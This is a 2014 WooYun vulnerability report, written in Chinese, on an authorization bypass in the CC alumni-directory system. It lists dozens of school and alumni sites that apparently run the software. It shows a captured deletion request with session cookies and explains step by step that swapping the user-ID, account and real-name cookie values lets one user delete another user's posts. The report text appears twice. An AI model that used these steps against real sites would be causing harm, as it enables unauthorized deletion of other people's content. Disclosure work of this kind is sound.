当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070015

漏洞标题:cc校友录系统存在越权#涉及大量学校

相关厂商:cclinux.com

漏洞作者: 小龙

提交时间:2014-07-28 18:33

修复时间:2014-08-02 18:34

公开时间:2014-08-02 18:34

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-28: 细节已通知厂商并且等待厂商处理中
2014-08-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

http://wooyun.org/bugs/wooyun-2010-063430
里面有涉及的网站。。
越权在手里了,妹纸还会远?我擦,这逼装得有点大了,汗都流出来了。。。
但是大家还是要谨记

详细说明:

在活动那里,不过这个没有任何严格检测
涉及的网站包括:

商业版部分成功案例
北京大学海南校友会
西安交通大学北京校友网
武汉大学上海校友网
西安交大深圳校友网
西安交通大学上海校友网
湖南大学深圳校友网
武大北京珞珈校友俱乐部
海军战友网
武汉理工京津校友网
到了吧!同学校友录
西安交大广州校友网
西安交大厦门校友网
西安建筑科技大学北京校友会
烟台富士康交友俱乐部
深圳市南京大学校友会
中南财经政法大学校友网
官林中学87届同学录
甲子中学83届校友会
广水市四中校友网
华中师范大学校友总会广东分会
水寨中学88届高三(1)班同学录
77293·35206老兵聚会网·老山一等功臣团
九团广州战友录
沈阳工业大学校友网
北京市第六幼儿园
江西人在惠州
肯德基员工录
北京菲亚特车友会—北京fiat车友会
山东艺术设计学院校友家园
历城二中50周年校庆专题
福建农林大学校友录
韶关学院校友录大家庭
东山校友网
绿谷社区
长沙县一中校友录
中山大学mba2004秋乙班同学录


他发送的是post的包,检测的是userid和usernamen,只要这两个用主人(号的主人)的id和name就能删除一些东西,多么神奇的一个功能。。。
http://test.crazygame.cn/v2014/meet/meet_detail.asp?id=329
这是我大Mosuan发的一个xss帖子

2.png

总是弹框出来,烦死了,身为一个屌丝,随手转发正能量,帮你del了。。。
我们删除自己的,然后抓包,看看发送了啥。。

3.png


GET /v2014/user/user_my_meet_del.asp?id=333 HTTP/1.1
Host: test.crazygame.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://test.crazygame.cn/v2014/meet/meet_detail.asp?id=333
Cookie: ASPSESSIONIDSARAACBR=KJMHGHOCDECIMKDEPMILFNPN; ccv2014demov2014demoSEN%5FsuccUrl=user%2Fuser%5Fmy%5Ffav%5Finfo%5Flist%2Easp; ccv2014demov2014demoSEN%5FUserTimeMap=2014%2D7%2D28+14%3A54%3A20; ccv2014demov2014demoSEN%5FUserKey=636dc8b4829598e5; ccv2014demov2014demoSEN%5FUserNowFace=avatar%2Fdefault%2Fm7%2Ejpg; ccv2014demov2014demoSEN%5FUserAccount=wooyun2; ccv2014demov2014demoSEN%5FUserDegree=1; ccv2014demov2014demoSEN%5FUserId=5979; ccv2014demov2014demoSEN%5FUserRealName=wooyun2
Connection: keep-alive


我们主要是修改
1:ccv2014demov2014demoSEN%5FUserAccount=wooyun2
2:ccv2014demov2014demoSEN%5FUserId=5979
3:ccv2014demov2014demoSEN%5FUserRealName=wooyun2
然后/v2014/user/user_my_meet_del.asp?id=333改成他的
怎么获取他的id? 查看源代码呗。。我们看到是5943
名字是:全紫涵 发现了burp不允许输入中文,纳闷半天。。然后想起了burp不是以url编码传输中文的吗。。 我们把他的名字url编码把。。 果然成功了,mark 马克一下,嘻嘻
url编码后是
%e5%85%a8%e7%b4%ab%e6%b6%b5

4.png


5.png


果然删除成功了

6.png


漏洞证明:

在活动那里,不过这个没有任何严格检测
涉及的网站包括:

商业版部分成功案例
北京大学海南校友会
西安交通大学北京校友网
武汉大学上海校友网
西安交大深圳校友网
西安交通大学上海校友网
湖南大学深圳校友网
武大北京珞珈校友俱乐部
海军战友网
武汉理工京津校友网
到了吧!同学校友录
西安交大广州校友网
西安交大厦门校友网
西安建筑科技大学北京校友会
烟台富士康交友俱乐部
深圳市南京大学校友会
中南财经政法大学校友网
官林中学87届同学录
甲子中学83届校友会
广水市四中校友网
华中师范大学校友总会广东分会
水寨中学88届高三(1)班同学录
77293·35206老兵聚会网·老山一等功臣团
九团广州战友录
沈阳工业大学校友网
北京市第六幼儿园
江西人在惠州
肯德基员工录
北京菲亚特车友会—北京fiat车友会
山东艺术设计学院校友家园
历城二中50周年校庆专题
福建农林大学校友录
韶关学院校友录大家庭
东山校友网
绿谷社区
长沙县一中校友录
中山大学mba2004秋乙班同学录


他发送的是post的包,检测的是userid和usernamen,只要这两个用主人(号的主人)的id和name就能删除一些东西,多么神奇的一个功能。。。
http://test.crazygame.cn/v2014/meet/meet_detail.asp?id=329
这是我大Mosuan发的一个xss帖子

2.png

总是弹框出来,烦死了,身为一个屌丝,随手转发正能量,帮你del了。。。
我们删除自己的,然后抓包,看看发送了啥。。

3.png


GET /v2014/user/user_my_meet_del.asp?id=333 HTTP/1.1
Host: test.crazygame.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://test.crazygame.cn/v2014/meet/meet_detail.asp?id=333
Cookie: ASPSESSIONIDSARAACBR=KJMHGHOCDECIMKDEPMILFNPN; ccv2014demov2014demoSEN%5FsuccUrl=user%2Fuser%5Fmy%5Ffav%5Finfo%5Flist%2Easp; ccv2014demov2014demoSEN%5FUserTimeMap=2014%2D7%2D28+14%3A54%3A20; ccv2014demov2014demoSEN%5FUserKey=636dc8b4829598e5; ccv2014demov2014demoSEN%5FUserNowFace=avatar%2Fdefault%2Fm7%2Ejpg; ccv2014demov2014demoSEN%5FUserAccount=wooyun2; ccv2014demov2014demoSEN%5FUserDegree=1; ccv2014demov2014demoSEN%5FUserId=5979; ccv2014demov2014demoSEN%5FUserRealName=wooyun2
Connection: keep-alive


我们主要是修改
1:ccv2014demov2014demoSEN%5FUserAccount=wooyun2
2:ccv2014demov2014demoSEN%5FUserId=5979
3:ccv2014demov2014demoSEN%5FUserRealName=wooyun2
然后/v2014/user/user_my_meet_del.asp?id=333改成他的
怎么获取他的id? 查看源代码呗。。我们看到是5943
名字是:全紫涵 发现了burp不允许输入中文,纳闷半天。。然后想起了burp不是以url编码传输中文的吗。。 我们把他的名字url编码把。。 果然成功了,mark 马克一下,嘻嘻
url编码后是
%e5%85%a8%e7%b4%ab%e6%b6%b5

4.png


5.png


果然删除成功了

6.png


修复方案:

(*^__^*) 忽略偷偷修复

版权声明:转载请注明来源 小龙@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-08-02 18:34

厂商回复:

最新状态:

暂无